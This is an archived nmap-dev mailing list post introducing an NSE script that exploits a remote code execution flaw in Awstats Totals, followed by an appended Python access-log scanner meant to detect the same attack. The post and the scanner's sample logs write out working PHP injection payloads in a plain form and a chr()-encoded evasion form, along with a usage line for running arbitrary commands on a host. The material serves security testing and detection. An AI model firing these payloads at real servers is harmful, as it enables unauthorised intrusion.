Nmap Development mailing list archives

http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14


From: Paulino Calderon <paulino () calderonpale com>
Date: Mon, 11 Jul 2011 02:43:40 -0700

Hi nmap-dev,

description = [[
http-awstatstotals-exec exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it. It works on PHP4 and PHP5 with magic quotes enabled. [CVE: 2008-3922]

  Stealth mode encodes the command string using PHP's chr() function. Ex.
  * Normal mode:
<code>?sort={%24{passthru%28$_GET[CMD]%29}}{%24{exit%28%29}}&CMD=uname%20-a</code>
  * Stealth mode:
<code>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</code>

Common paths for Awstats Totals:
* /awstats/index.php
* /awstatstotals/index.php
* /awstats/awstatstotals.php
]]

---
-- @usage
-- nmap --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.stealth, http-awstatstotals-exec.uri=/awstats/index.php' -p80 <host/ip>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- |_http-awstatstotals-exec.nse: Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
--
-- @args http-awstatstotals-exec.uri Awstats Totals URI including path
-- @args http-awstatstotals-exec.cmd Command to execute
-- @args http-awstatstotals-exec.stealth Stealth mode encodes command payload using PHP's chr()
-- @args http-awstatstotals-exec.outfile Output file
---


--
Paulino Calderón Pale
Web: http://calderonpale.com
Twitter: http://www.twitter.com/paulinocaIderon

Attachment: http-awstatstotals-exec.nse
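Defender-side companion to the exploit pattern described above, as an added example that is not part of the posted script: a small scanner over web-server access log lines that flags requests whose sort parameter carries the {${...}} PHP injection, in either the plain form or the chr()-encoded stealth form. The log lines, IP addresses and regular expressions are constructed for illustration; the known paths come from the description.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Paths the script description lists as common Awstats Totals locations.
KNOWN_PATHS = {"/awstats/index.php", "/awstatstotals/index.php", "/awstats/awstatstotals.php"}

# CVE-2008-3922 is triggered by a PHP "complex variable" expression, {${...}},
# smuggled into the sort parameter. Plain payloads name an execution function
# directly; the script's stealth mode builds the command from chained chr() calls.
COMPLEX_VAR = re.compile(r"\{\s*\$\s*\{")
EXEC_CALL = re.compile(r"\b(passthru|system|exec|shell_exec|popen|proc_open|eval)\s*\(", re.I)
CHR_CHAIN = re.compile(r"(?:chr\s*\(\s*\d+\s*\)\s*\.?\s*){3,}", re.I)

# Apache/nginx combined log format; only the fields needed here are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_sort_param(target):
    """Return 'stealth', 'plain', 'injection' or None for one request target."""
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)
    for value in params.get("sort", []):
        decoded = unquote(value)  # parse_qs decoded once; a second pass catches double encoding
        if not COMPLEX_VAR.search(decoded):
            continue
        if CHR_CHAIN.search(decoded):
            return "stealth"
        if EXEC_CALL.search(decoded):
            return "plain"
        return "injection"
    return None

def scan_log(lines):
    """Return a list of (ip, kind, known_path, path) for every flagged request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify_sort_param(m["target"])
        if kind:
            path = urlsplit(m["target"]).path
            findings.append((m["ip"], kind, path in KNOWN_PATHS, path))
    return findings

# Constructed sample log lines (not real traffic); the payloads mirror the description above.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Jul/2011:02:43:40 -0700] "GET /awstats/index.php?sort={%24{passthru%28$_GET[CMD]%29}}{%24{exit%28%29}}&CMD=uname%20-a HTTP/1.1" 200 512',
    '203.0.113.7 - - [11/Jul/2011:02:44:02 -0700] "GET /stats/awstatstotals.php?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101)%29}}{%24{exit%28%29}} HTTP/1.1" 200 498',
    '198.51.100.4 - - [11/Jul/2011:02:45:10 -0700] "GET /awstats/index.php?sort=pages&year=2011 HTTP/1.1" 200 8123',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The second sample hits a non-standard path, which is why the path check only labels a finding rather than gating it.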

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
